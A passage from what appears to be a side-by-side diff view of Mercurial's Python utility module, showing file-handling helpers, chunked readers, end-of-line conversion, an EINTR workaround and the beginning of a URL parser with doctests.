2257
2259
2258 def __enter__(self):
2260 def __enter__(self):
2259 return self
2261 return self
2260
2262
2261 def __exit__(self, exctype, excvalue, traceback):
2263 def __exit__(self, exctype, excvalue, traceback):
2262 if exctype is not None:
2264 if exctype is not None:
2263 self.discard()
2265 self.discard()
2264 else:
2266 else:
2265 self.close()
2267 self.close()
2266
2268
2267 def unlinkpath(f, ignoremissing=False, rmdir=True):
2269 def unlinkpath(f, ignoremissing=False, rmdir=True):
2268 """unlink and remove the directory if it is empty"""
2270 """unlink and remove the directory if it is empty"""
2269 if ignoremissing:
2271 if ignoremissing:
2270 tryunlink(f)
2272 tryunlink(f)
2271 else:
2273 else:
2272 unlink(f)
2274 unlink(f)
2273 if rmdir:
2275 if rmdir:
2274 # try removing directories that might now be empty
2276 # try removing directories that might now be empty
2275 try:
2277 try:
2276 removedirs(os.path.dirname(f))
2278 removedirs(os.path.dirname(f))
2277 except OSError:
2279 except OSError:
2278 pass
2280 pass
2279
2281
2280 def tryunlink(f):
2282 def tryunlink(f):
2281 """Attempt to remove a file, ignoring ENOENT errors."""
2283 """Attempt to remove a file, ignoring ENOENT errors."""
2282 try:
2284 try:
2283 unlink(f)
2285 unlink(f)
2284 except OSError as e:
2286 except OSError as e:
2285 if e.errno != errno.ENOENT:
2287 if e.errno != errno.ENOENT:
2286 raise
2288 raise
2287
2289
2288 def makedirs(name, mode=None, notindexed=False):
2290 def makedirs(name, mode=None, notindexed=False):
2289 """recursive directory creation with parent mode inheritance
2291 """recursive directory creation with parent mode inheritance
2290
2292
2291 Newly created directories are marked as "not to be indexed by
2293 Newly created directories are marked as "not to be indexed by
2292 the content indexing service", if ``notindexed`` is specified
2294 the content indexing service", if ``notindexed`` is specified
2293 for "write" mode access.
2295 for "write" mode access.
2294 """
2296 """
2295 try:
2297 try:
2296 makedir(name, notindexed)
2298 makedir(name, notindexed)
2297 except OSError as err:
2299 except OSError as err:
2298 if err.errno == errno.EEXIST:
2300 if err.errno == errno.EEXIST:
2299 return
2301 return
2300 if err.errno != errno.ENOENT or not name:
2302 if err.errno != errno.ENOENT or not name:
2301 raise
2303 raise
2302 parent = os.path.dirname(os.path.abspath(name))
2304 parent = os.path.dirname(os.path.abspath(name))
2303 if parent == name:
2305 if parent == name:
2304 raise
2306 raise
2305 makedirs(parent, mode, notindexed)
2307 makedirs(parent, mode, notindexed)
2306 try:
2308 try:
2307 makedir(name, notindexed)
2309 makedir(name, notindexed)
2308 except OSError as err:
2310 except OSError as err:
2309 # Catch EEXIST to handle races
2311 # Catch EEXIST to handle races
2310 if err.errno == errno.EEXIST:
2312 if err.errno == errno.EEXIST:
2311 return
2313 return
2312 raise
2314 raise
2313 if mode is not None:
2315 if mode is not None:
2314 os.chmod(name, mode)
2316 os.chmod(name, mode)
2315
2317
2316 def readfile(path):
2318 def readfile(path):
2317 with open(path, 'rb') as fp:
2319 with open(path, 'rb') as fp:
2318 return fp.read()
2320 return fp.read()
2319
2321
2320 def writefile(path, text):
2322 def writefile(path, text):
2321 with open(path, 'wb') as fp:
2323 with open(path, 'wb') as fp:
2322 fp.write(text)
2324 fp.write(text)
2323
2325
2324 def appendfile(path, text):
2326 def appendfile(path, text):
2325 with open(path, 'ab') as fp:
2327 with open(path, 'ab') as fp:
2326 fp.write(text)
2328 fp.write(text)
2327
2329
2328 class chunkbuffer(object):
2330 class chunkbuffer(object):
2329 """Allow arbitrary sized chunks of data to be efficiently read from an
2331 """Allow arbitrary sized chunks of data to be efficiently read from an
2330 iterator over chunks of arbitrary size."""
2332 iterator over chunks of arbitrary size."""
2331
2333
2332 def __init__(self, in_iter):
2334 def __init__(self, in_iter):
2333 """in_iter is the iterator that's iterating over the input chunks."""
2335 """in_iter is the iterator that's iterating over the input chunks."""
2334 def splitbig(chunks):
2336 def splitbig(chunks):
2335 for chunk in chunks:
2337 for chunk in chunks:
2336 if len(chunk) > 2**20:
2338 if len(chunk) > 2**20:
2337 pos = 0
2339 pos = 0
2338 while pos < len(chunk):
2340 while pos < len(chunk):
2339 end = pos + 2 ** 18
2341 end = pos + 2 ** 18
2340 yield chunk[pos:end]
2342 yield chunk[pos:end]
2341 pos = end
2343 pos = end
2342 else:
2344 else:
2343 yield chunk
2345 yield chunk
2344 self.iter = splitbig(in_iter)
2346 self.iter = splitbig(in_iter)
2345 self._queue = collections.deque()
2347 self._queue = collections.deque()
2346 self._chunkoffset = 0
2348 self._chunkoffset = 0
2347
2349
2348 def read(self, l=None):
2350 def read(self, l=None):
2349 """Read L bytes of data from the iterator of chunks of data.
2351 """Read L bytes of data from the iterator of chunks of data.
2350 Returns less than L bytes if the iterator runs dry.
2352 Returns less than L bytes if the iterator runs dry.
2351
2353
2352 If size parameter is omitted, read everything"""
2354 If size parameter is omitted, read everything"""
2353 if l is None:
2355 if l is None:
2354 return ''.join(self.iter)
2356 return ''.join(self.iter)
2355
2357
2356 left = l
2358 left = l
2357 buf = []
2359 buf = []
2358 queue = self._queue
2360 queue = self._queue
2359 while left > 0:
2361 while left > 0:
2360 # refill the queue
2362 # refill the queue
2361 if not queue:
2363 if not queue:
2362 target = 2**18
2364 target = 2**18
2363 for chunk in self.iter:
2365 for chunk in self.iter:
2364 queue.append(chunk)
2366 queue.append(chunk)
2365 target -= len(chunk)
2367 target -= len(chunk)
2366 if target <= 0:
2368 if target <= 0:
2367 break
2369 break
2368 if not queue:
2370 if not queue:
2369 break
2371 break
2370
2372
2371 # The easy way to do this would be to queue.popleft(), modify the
2373 # The easy way to do this would be to queue.popleft(), modify the
2372 # chunk (if necessary), then queue.appendleft(). However, for cases
2374 # chunk (if necessary), then queue.appendleft(). However, for cases
2373 # where we read partial chunk content, this incurs 2 dequeue
2375 # where we read partial chunk content, this incurs 2 dequeue
2374 # mutations and creates a new str for the remaining chunk in the
2376 # mutations and creates a new str for the remaining chunk in the
2375 # queue. Our code below avoids this overhead.
2377 # queue. Our code below avoids this overhead.
2376
2378
2377 chunk = queue[0]
2379 chunk = queue[0]
2378 chunkl = len(chunk)
2380 chunkl = len(chunk)
2379 offset = self._chunkoffset
2381 offset = self._chunkoffset
2380
2382
2381 # Use full chunk.
2383 # Use full chunk.
2382 if offset == 0 and left >= chunkl:
2384 if offset == 0 and left >= chunkl:
2383 left -= chunkl
2385 left -= chunkl
2384 queue.popleft()
2386 queue.popleft()
2385 buf.append(chunk)
2387 buf.append(chunk)
2386 # self._chunkoffset remains at 0.
2388 # self._chunkoffset remains at 0.
2387 continue
2389 continue
2388
2390
2389 chunkremaining = chunkl - offset
2391 chunkremaining = chunkl - offset
2390
2392
2391 # Use all of unconsumed part of chunk.
2393 # Use all of unconsumed part of chunk.
2392 if left >= chunkremaining:
2394 if left >= chunkremaining:
2393 left -= chunkremaining
2395 left -= chunkremaining
2394 queue.popleft()
2396 queue.popleft()
2395 # offset == 0 is enabled by block above, so this won't merely
2397 # offset == 0 is enabled by block above, so this won't merely
2396 # copy via ``chunk[0:]``.
2398 # copy via ``chunk[0:]``.
2397 buf.append(chunk[offset:])
2399 buf.append(chunk[offset:])
2398 self._chunkoffset = 0
2400 self._chunkoffset = 0
2399
2401
2400 # Partial chunk needed.
2402 # Partial chunk needed.
2401 else:
2403 else:
2402 buf.append(chunk[offset:offset + left])
2404 buf.append(chunk[offset:offset + left])
2403 self._chunkoffset += left
2405 self._chunkoffset += left
2404 left -= chunkremaining
2406 left -= chunkremaining
2405
2407
2406 return ''.join(buf)
2408 return ''.join(buf)
2407
2409
2408 def filechunkiter(f, size=131072, limit=None):
2410 def filechunkiter(f, size=131072, limit=None):
2409 """Create a generator that produces the data in the file size
2411 """Create a generator that produces the data in the file size
2410 (default 131072) bytes at a time, up to optional limit (default is
2412 (default 131072) bytes at a time, up to optional limit (default is
2411 to read all data). Chunks may be less than size bytes if the
2413 to read all data). Chunks may be less than size bytes if the
2412 chunk is the last chunk in the file, or the file is a socket or
2414 chunk is the last chunk in the file, or the file is a socket or
2413 some other type of file that sometimes reads less data than is
2415 some other type of file that sometimes reads less data than is
2414 requested."""
2416 requested."""
2415 assert size >= 0
2417 assert size >= 0
2416 assert limit is None or limit >= 0
2418 assert limit is None or limit >= 0
2417 while True:
2419 while True:
2418 if limit is None:
2420 if limit is None:
2419 nbytes = size
2421 nbytes = size
2420 else:
2422 else:
2421 nbytes = min(limit, size)
2423 nbytes = min(limit, size)
2422 s = nbytes and f.read(nbytes)
2424 s = nbytes and f.read(nbytes)
2423 if not s:
2425 if not s:
2424 break
2426 break
2425 if limit:
2427 if limit:
2426 limit -= len(s)
2428 limit -= len(s)
2427 yield s
2429 yield s
2428
2430
2429 class cappedreader(object):
2431 class cappedreader(object):
2430 """A file object proxy that allows reading up to N bytes.
2432 """A file object proxy that allows reading up to N bytes.
2431
2433
2432 Given a source file object, instances of this type allow reading up to
2434 Given a source file object, instances of this type allow reading up to
2433 N bytes from that source file object. Attempts to read past the allowed
2435 N bytes from that source file object. Attempts to read past the allowed
2434 limit are treated as EOF.
2436 limit are treated as EOF.
2435
2437
2436 It is assumed that I/O is not performed on the original file object
2438 It is assumed that I/O is not performed on the original file object
2437 in addition to I/O that is performed by this instance. If there is,
2439 in addition to I/O that is performed by this instance. If there is,
2438 state tracking will get out of sync and unexpected results will ensue.
2440 state tracking will get out of sync and unexpected results will ensue.
2439 """
2441 """
2440 def __init__(self, fh, limit):
2442 def __init__(self, fh, limit):
2441 """Allow reading up to <limit> bytes from <fh>."""
2443 """Allow reading up to <limit> bytes from <fh>."""
2442 self._fh = fh
2444 self._fh = fh
2443 self._left = limit
2445 self._left = limit
2444
2446
2445 def read(self, n=-1):
2447 def read(self, n=-1):
2446 if not self._left:
2448 if not self._left:
2447 return b''
2449 return b''
2448
2450
2449 if n < 0:
2451 if n < 0:
2450 n = self._left
2452 n = self._left
2451
2453
2452 data = self._fh.read(min(n, self._left))
2454 data = self._fh.read(min(n, self._left))
2453 self._left -= len(data)
2455 self._left -= len(data)
2454 assert self._left >= 0
2456 assert self._left >= 0
2455
2457
2456 return data
2458 return data
2457
2459
2458 def readinto(self, b):
2460 def readinto(self, b):
2459 res = self.read(len(b))
2461 res = self.read(len(b))
2460 if res is None:
2462 if res is None:
2461 return None
2463 return None
2462
2464
2463 b[0:len(res)] = res
2465 b[0:len(res)] = res
2464 return len(res)
2466 return len(res)
2465
2467
2466 def unitcountfn(*unittable):
2468 def unitcountfn(*unittable):
2467 '''return a function that renders a readable count of some quantity'''
2469 '''return a function that renders a readable count of some quantity'''
2468
2470
2469 def go(count):
2471 def go(count):
2470 for multiplier, divisor, format in unittable:
2472 for multiplier, divisor, format in unittable:
2471 if abs(count) >= divisor * multiplier:
2473 if abs(count) >= divisor * multiplier:
2472 return format % (count / float(divisor))
2474 return format % (count / float(divisor))
2473 return unittable[-1][2] % count
2475 return unittable[-1][2] % count
2474
2476
2475 return go
2477 return go
2476
2478
2477 def processlinerange(fromline, toline):
2479 def processlinerange(fromline, toline):
2478 """Check that linerange <fromline>:<toline> makes sense and return a
2480 """Check that linerange <fromline>:<toline> makes sense and return a
2479 0-based range.
2481 0-based range.
2480
2482
2481 >>> processlinerange(10, 20)
2483 >>> processlinerange(10, 20)
2482 (9, 20)
2484 (9, 20)
2483 >>> processlinerange(2, 1)
2485 >>> processlinerange(2, 1)
2484 Traceback (most recent call last):
2486 Traceback (most recent call last):
2485 ...
2487 ...
2486 ParseError: line range must be positive
2488 ParseError: line range must be positive
2487 >>> processlinerange(0, 5)
2489 >>> processlinerange(0, 5)
2488 Traceback (most recent call last):
2490 Traceback (most recent call last):
2489 ...
2491 ...
2490 ParseError: fromline must be strictly positive
2492 ParseError: fromline must be strictly positive
2491 """
2493 """
2492 if toline - fromline < 0:
2494 if toline - fromline < 0:
2493 raise error.ParseError(_("line range must be positive"))
2495 raise error.ParseError(_("line range must be positive"))
2494 if fromline < 1:
2496 if fromline < 1:
2495 raise error.ParseError(_("fromline must be strictly positive"))
2497 raise error.ParseError(_("fromline must be strictly positive"))
2496 return fromline - 1, toline
2498 return fromline - 1, toline
2497
2499
2498 bytecount = unitcountfn(
2500 bytecount = unitcountfn(
2499 (100, 1 << 30, _('%.0f GB')),
2501 (100, 1 << 30, _('%.0f GB')),
2500 (10, 1 << 30, _('%.1f GB')),
2502 (10, 1 << 30, _('%.1f GB')),
2501 (1, 1 << 30, _('%.2f GB')),
2503 (1, 1 << 30, _('%.2f GB')),
2502 (100, 1 << 20, _('%.0f MB')),
2504 (100, 1 << 20, _('%.0f MB')),
2503 (10, 1 << 20, _('%.1f MB')),
2505 (10, 1 << 20, _('%.1f MB')),
2504 (1, 1 << 20, _('%.2f MB')),
2506 (1, 1 << 20, _('%.2f MB')),
2505 (100, 1 << 10, _('%.0f KB')),
2507 (100, 1 << 10, _('%.0f KB')),
2506 (10, 1 << 10, _('%.1f KB')),
2508 (10, 1 << 10, _('%.1f KB')),
2507 (1, 1 << 10, _('%.2f KB')),
2509 (1, 1 << 10, _('%.2f KB')),
2508 (1, 1, _('%.0f bytes')),
2510 (1, 1, _('%.0f bytes')),
2509 )
2511 )
2510
2512
2511 class transformingwriter(object):
2513 class transformingwriter(object):
2512 """Writable file wrapper to transform data by function"""
2514 """Writable file wrapper to transform data by function"""
2513
2515
2514 def __init__(self, fp, encode):
2516 def __init__(self, fp, encode):
2515 self._fp = fp
2517 self._fp = fp
2516 self._encode = encode
2518 self._encode = encode
2517
2519
2518 def close(self):
2520 def close(self):
2519 self._fp.close()
2521 self._fp.close()
2520
2522
2521 def flush(self):
2523 def flush(self):
2522 self._fp.flush()
2524 self._fp.flush()
2523
2525
2524 def write(self, data):
2526 def write(self, data):
2525 return self._fp.write(self._encode(data))
2527 return self._fp.write(self._encode(data))
2526
2528
2527 # Matches a single EOL which can either be a CRLF where repeated CR
2529 # Matches a single EOL which can either be a CRLF where repeated CR
2528 # are removed or a LF. We do not care about old Macintosh files, so a
2530 # are removed or a LF. We do not care about old Macintosh files, so a
2529 # stray CR is an error.
2531 # stray CR is an error.
2530 _eolre = remod.compile(br'\r*\n')
2532 _eolre = remod.compile(br'\r*\n')
2531
2533
2532 def tolf(s):
2534 def tolf(s):
2533 return _eolre.sub('\n', s)
2535 return _eolre.sub('\n', s)
2534
2536
2535 def tocrlf(s):
2537 def tocrlf(s):
2536 return _eolre.sub('\r\n', s)
2538 return _eolre.sub('\r\n', s)
2537
2539
2538 def _crlfwriter(fp):
2540 def _crlfwriter(fp):
2539 return transformingwriter(fp, tocrlf)
2541 return transformingwriter(fp, tocrlf)
2540
2542
2541 if pycompat.oslinesep == '\r\n':
2543 if pycompat.oslinesep == '\r\n':
2542 tonativeeol = tocrlf
2544 tonativeeol = tocrlf
2543 fromnativeeol = tolf
2545 fromnativeeol = tolf
2544 nativeeolwriter = _crlfwriter
2546 nativeeolwriter = _crlfwriter
2545 else:
2547 else:
2546 tonativeeol = pycompat.identity
2548 tonativeeol = pycompat.identity
2547 fromnativeeol = pycompat.identity
2549 fromnativeeol = pycompat.identity
2548 nativeeolwriter = pycompat.identity
2550 nativeeolwriter = pycompat.identity
2549
2551
2550 if (pyplatform.python_implementation() == 'CPython' and
2552 if (pyplatform.python_implementation() == 'CPython' and
2551 sys.version_info < (3, 0)):
2553 sys.version_info < (3, 0)):
2552 # There is an issue in CPython that some IO methods do not handle EINTR
2554 # There is an issue in CPython that some IO methods do not handle EINTR
2553 # correctly. The following table shows what CPython version (and functions)
2555 # correctly. The following table shows what CPython version (and functions)
2554 # are affected (buggy: has the EINTR bug, okay: otherwise):
2556 # are affected (buggy: has the EINTR bug, okay: otherwise):
2555 #
2557 #
2556 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2558 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2557 # --------------------------------------------------
2559 # --------------------------------------------------
2558 # fp.__iter__ | buggy | buggy | okay
2560 # fp.__iter__ | buggy | buggy | okay
2559 # fp.read* | buggy | okay [1] | okay
2561 # fp.read* | buggy | okay [1] | okay
2560 #
2562 #
2561 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2563 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2562 #
2564 #
2563 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2565 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2564 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2566 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2565 #
2567 #
2566 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2568 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2567 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2569 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2568 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2570 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2569 # fp.__iter__ but not other fp.read* methods.
2571 # fp.__iter__ but not other fp.read* methods.
2570 #
2572 #
2571 # On modern systems like Linux, the "read" syscall cannot be interrupted
2573 # On modern systems like Linux, the "read" syscall cannot be interrupted
2572 # when reading "fast" files like on-disk files. So the EINTR issue only
2574 # when reading "fast" files like on-disk files. So the EINTR issue only
2573 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2575 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2574 # files approximately as "fast" files and use the fast (unsafe) code path,
2576 # files approximately as "fast" files and use the fast (unsafe) code path,
2575 # to minimize the performance impact.
2577 # to minimize the performance impact.
2576 if sys.version_info >= (2, 7, 4):
2578 if sys.version_info >= (2, 7, 4):
2577 # fp.readline deals with EINTR correctly, use it as a workaround.
2579 # fp.readline deals with EINTR correctly, use it as a workaround.
2578 def _safeiterfile(fp):
2580 def _safeiterfile(fp):
2579 return iter(fp.readline, '')
2581 return iter(fp.readline, '')
2580 else:
2582 else:
2581 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2583 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2582 # note: this may block longer than necessary because of bufsize.
2584 # note: this may block longer than necessary because of bufsize.
2583 def _safeiterfile(fp, bufsize=4096):
2585 def _safeiterfile(fp, bufsize=4096):
2584 fd = fp.fileno()
2586 fd = fp.fileno()
2585 line = ''
2587 line = ''
2586 while True:
2588 while True:
2587 try:
2589 try:
2588 buf = os.read(fd, bufsize)
2590 buf = os.read(fd, bufsize)
2589 except OSError as ex:
2591 except OSError as ex:
2590 # os.read only raises EINTR before any data is read
2592 # os.read only raises EINTR before any data is read
2591 if ex.errno == errno.EINTR:
2593 if ex.errno == errno.EINTR:
2592 continue
2594 continue
2593 else:
2595 else:
2594 raise
2596 raise
2595 line += buf
2597 line += buf
2596 if '\n' in buf:
2598 if '\n' in buf:
2597 splitted = line.splitlines(True)
2599 splitted = line.splitlines(True)
2598 line = ''
2600 line = ''
2599 for l in splitted:
2601 for l in splitted:
2600 if l[-1] == '\n':
2602 if l[-1] == '\n':
2601 yield l
2603 yield l
2602 else:
2604 else:
2603 line = l
2605 line = l
2604 if not buf:
2606 if not buf:
2605 break
2607 break
2606 if line:
2608 if line:
2607 yield line
2609 yield line
2608
2610
2609 def iterfile(fp):
2611 def iterfile(fp):
2610 fastpath = True
2612 fastpath = True
2611 if type(fp) is file:
2613 if type(fp) is file:
2612 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2614 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2613 if fastpath:
2615 if fastpath:
2614 return fp
2616 return fp
2615 else:
2617 else:
2616 return _safeiterfile(fp)
2618 return _safeiterfile(fp)
2617 else:
2619 else:
2618 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2620 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2619 def iterfile(fp):
2621 def iterfile(fp):
2620 return fp
2622 return fp
2621
2623
2622 def iterlines(iterator):
2624 def iterlines(iterator):
2623 for chunk in iterator:
2625 for chunk in iterator:
2624 for line in chunk.splitlines():
2626 for line in chunk.splitlines():
2625 yield line
2627 yield line
2626
2628
2627 def expandpath(path):
2629 def expandpath(path):
2628 return os.path.expanduser(os.path.expandvars(path))
2630 return os.path.expanduser(os.path.expandvars(path))
2629
2631
2630 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2632 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2631 """Return the result of interpolating items in the mapping into string s.
2633 """Return the result of interpolating items in the mapping into string s.
2632
2634
2633 prefix is a single character string, or a two character string with
2635 prefix is a single character string, or a two character string with
2634 a backslash as the first character if the prefix needs to be escaped in
2636 a backslash as the first character if the prefix needs to be escaped in
2635 a regular expression.
2637 a regular expression.
2636
2638
2637 fn is an optional function that will be applied to the replacement text
2639 fn is an optional function that will be applied to the replacement text
2638 just before replacement.
2640 just before replacement.
2639
2641
2640 escape_prefix is an optional flag that allows using doubled prefix for
2642 escape_prefix is an optional flag that allows using doubled prefix for
2641 its escaping.
2643 its escaping.
2642 """
2644 """
2643 fn = fn or (lambda s: s)
2645 fn = fn or (lambda s: s)
2644 patterns = '|'.join(mapping.keys())
2646 patterns = '|'.join(mapping.keys())
2645 if escape_prefix:
2647 if escape_prefix:
2646 patterns += '|' + prefix
2648 patterns += '|' + prefix
2647 if len(prefix) > 1:
2649 if len(prefix) > 1:
2648 prefix_char = prefix[1:]
2650 prefix_char = prefix[1:]
2649 else:
2651 else:
2650 prefix_char = prefix
2652 prefix_char = prefix
2651 mapping[prefix_char] = prefix_char
2653 mapping[prefix_char] = prefix_char
2652 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2654 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2653 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2655 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2654
2656
2655 def getport(port):
2657 def getport(port):
2656 """Return the port for a given network service.
2658 """Return the port for a given network service.
2657
2659
2658 If port is an integer, it's returned as is. If it's a string, it's
2660 If port is an integer, it's returned as is. If it's a string, it's
2659 looked up using socket.getservbyname(). If there's no matching
2661 looked up using socket.getservbyname(). If there's no matching
2660 service, error.Abort is raised.
2662 service, error.Abort is raised.
2661 """
2663 """
2662 try:
2664 try:
2663 return int(port)
2665 return int(port)
2664 except ValueError:
2666 except ValueError:
2665 pass
2667 pass
2666
2668
2667 try:
2669 try:
2668 return socket.getservbyname(pycompat.sysstr(port))
2670 return socket.getservbyname(pycompat.sysstr(port))
2669 except socket.error:
2671 except socket.error:
2670 raise error.Abort(_("no port number associated with service '%s'")
2672 raise error.Abort(_("no port number associated with service '%s'")
2671 % port)
2673 % port)
2672
2674
2673 class url(object):
2675 class url(object):
2674 r"""Reliable URL parser.
2676 r"""Reliable URL parser.
2675
2677
2676 This parses URLs and provides attributes for the following
2678 This parses URLs and provides attributes for the following
2677 components:
2679 components:
2678
2680
2679 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2681 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2680
2682
2681 Missing components are set to None. The only exception is
2683 Missing components are set to None. The only exception is
2682 fragment, which is set to '' if present but empty.
2684 fragment, which is set to '' if present but empty.
2683
2685
2684 If parsefragment is False, fragment is included in query. If
2686 If parsefragment is False, fragment is included in query. If
2685 parsequery is False, query is included in path. If both are
2687 parsequery is False, query is included in path. If both are
2686 False, both fragment and query are included in path.
2688 False, both fragment and query are included in path.
2687
2689
2688 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2690 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2689
2691
2690 Note that for backward compatibility reasons, bundle URLs do not
2692 Note that for backward compatibility reasons, bundle URLs do not
2691 take host names. That means 'bundle://../' has a path of '../'.
2693 take host names. That means 'bundle://../' has a path of '../'.
2692
2694
2693 Examples:
2695 Examples:
2694
2696
2695 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2697 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2696 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2698 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2697 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2699 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2698 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2700 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2699 >>> url(b'file:///home/joe/repo')
2701 >>> url(b'file:///home/joe/repo')
2700 <url scheme: 'file', path: '/home/joe/repo'>
2702 <url scheme: 'file', path: '/home/joe/repo'>
2701 >>> url(b'file:///c:/temp/foo/')
2703 >>> url(b'file:///c:/temp/foo/')
2702 <url scheme: 'file', path: 'c:/temp/foo/'>
2704 <url scheme: 'file', path: 'c:/temp/foo/'>
2703 >>> url(b'bundle:foo')
2705 >>> url(b'bundle:foo')
2704 <url scheme: 'bundle', path: 'foo'>
2706 <url scheme: 'bundle', path: 'foo'>
2705 >>> url(b'bundle://../foo')
2707 >>> url(b'bundle://../foo')
2706 <url scheme: 'bundle', path: '../foo'>
2708 <url scheme: 'bundle', path: '../foo'>
2707 >>> url(br'c:\foo\bar')
2709 >>> url(br'c:\foo\bar')
2708 <url path: 'c:\\foo\\bar'>
2710 <url path: 'c:\\foo\\bar'>
2709 >>> url(br'\\blah\blah\blah')
2711 >>> url(br'\\blah\blah\blah')
2710 <url path: '\\\\blah\\blah\\blah'>
2712 <url path: '\\\\blah\\blah\\blah'>
2711 >>> url(br'\\blah\blah\blah#baz')
2713 >>> url(br'\\blah\blah\blah#baz')
2712 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2714 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2713 >>> url(br'file:///C:\users\me')
2715 >>> url(br'file:///C:\users\me')
2714 <url scheme: 'file', path: 'C:\\users\\me'>
2716 <url scheme: 'file', path: 'C:\\users\\me'>
2715
2717
2716 Authentication credentials:
2718 Authentication credentials:
2717
2719
2718 >>> url(b'ssh://joe:xyz@x/repo')
2720 >>> url(b'ssh://joe:xyz@x/repo')
2719 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2721 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2720 >>> url(b'ssh://joe@x/repo')
2722 >>> url(b'ssh://joe@x/repo')
2721 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2723 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2722
2724
2723 Query strings and fragments:
2725 Query strings and fragments:
2724
2726
2725 >>> url(b'http://host/a?b#c')
2727 >>> url(b'http://host/a?b#c')
2726 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2728 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2727 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2729 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2728 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2730 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2729
2731
2730 Empty path:
2732 Empty path:
2731
2733
2732 >>> url(b'')
2734 >>> url(b'')
2733 <url path: ''>
2735 <url path: ''>
2734 >>> url(b'#a')
2736 >>> url(b'#a')
2735 <url path: '', fragment: 'a'>
2737 <url path: '', fragment: 'a'>
2736 >>> url(b'http://host/')
2738 >>> url(b'http://host/')
2737 <url scheme: 'http', host: 'host', path: ''>
2739 <url scheme: 'http', host: 'host', path: ''>
2738 >>> url(b'http://host/#a')
2740 >>> url(b'http://host/#a')
2739 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2741 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2740
2742
2741 Only scheme:
2743 Only scheme:
2742
2744
2743 >>> url(b'http:')
2745 >>> url(b'http:')
2744 <url scheme: 'http'>
2746 <url scheme: 'http'>
2745 """
2747 """
2746
2748
2747 _safechars = "!~*'()+"
2749 _safechars = "!~*'()+"
2748 _safepchars = "/!~*'()+:\\"
2750 _safepchars = "/!~*'()+:\\"
2749 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2751 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2750
2752
2751 def __init__(self, path, parsequery=True, parsefragment=True):
2753 def __init__(self, path, parsequery=True, parsefragment=True):
2752 # We slowly chomp away at path until we have only the path left
2754 # We slowly chomp away at path until we have only the path left
2753 self.scheme = self.user = self.passwd = self.host = None
2755 self.scheme = self.user = self.passwd = self.host = None
2754 self.port = self.path = self.query = self.fragment = None
2756 self.port = self.path = self.query = self.fragment = None
2755 self._localpath = True
2757 self._localpath = True
2756 self._hostport = ''
2758 self._hostport = ''
2757 self._origpath = path
2759 self._origpath = path
2758
2760
2759 if parsefragment and '#' in path:
2761 if parsefragment and '#' in path:
2760 path, self.fragment = path.split('#', 1)
2762 path, self.fragment = path.split('#', 1)
2761
2763
2762 # special case for Windows drive letters and UNC paths
2764 # special case for Windows drive letters and UNC paths
2763 if hasdriveletter(path) or path.startswith('\\\\'):
2765 if hasdriveletter(path) or path.startswith('\\\\'):
2764 self.path = path
2766 self.path = path
2765 return
2767 return
2766
2768
2767 # For compatibility reasons, we can't handle bundle paths as
2769 # For compatibility reasons, we can't handle bundle paths as
2768 # normal URLS
2770 # normal URLS
2769 if path.startswith('bundle:'):
2771 if path.startswith('bundle:'):
2770 self.scheme = 'bundle'
2772 self.scheme = 'bundle'
2771 path = path[7:]
2773 path = path[7:]
2772 if path.startswith('//'):
2774 if path.startswith('//'):
2773 path = path[2:]
2775 path = path[2:]
2774 self.path = path
2776 self.path = path
